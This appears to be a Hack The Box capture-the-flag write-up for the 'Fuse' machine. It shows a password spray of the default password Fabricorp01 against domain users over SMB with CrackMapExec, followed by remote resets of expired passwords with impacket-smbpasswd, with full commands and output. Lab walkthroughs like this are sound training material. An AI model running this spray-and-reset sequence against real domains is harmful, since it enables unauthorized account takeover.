Fuse_Password_Spray

Default Password Theory

---

considering the following:

• STATUS_PASSWORD_MUST_CHANGE was given to the bnielson user upon attempting to authenticate to the SMB server
• The bnielson user is indeed the new starter.
• It is very common practice among sysadmins to set User must change password at next logon for new users

There is a high probability that the password, Fabricorp01, is the default password of the organization In which case, there may be other users with the same password

Password Spray

---

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ cme smb $IP -d FABRICORP.LOCAL --kdcHost fuse.fabricorp.local -u users -p Fabricorp01 --continue-on-success
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:FABRICORP.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\Guest:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\krbtgt:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\svc-print:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\svc-scan:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\dandrews:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\mberbatov:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\dmuir:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\astein:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\sthompson:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\fuse:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\pmerton:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\administrator:Fabricorp01 STATUS_LOGON_FAILURE 

It turns out there are 2 additional users that returns the STATUS_PASSWORD_MUST_CHANGE error; tlabel and bhult This means that I am able to change their passwords remotely just like how it was done for the bnielson user

Remote Password Reset

---

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-smbpasswd fabricorp.local/tlavel:Fabricorp01@$IP -newpass Qwer0000  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-smbpasswd fabricorp.local/bhult:Fabricorp01@$IP -newpass Qwer0000 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

Just like how it is for the bnielson user, all the password gets reset periodically due to the suspected background task. I would have to keep resetting users password as I go along.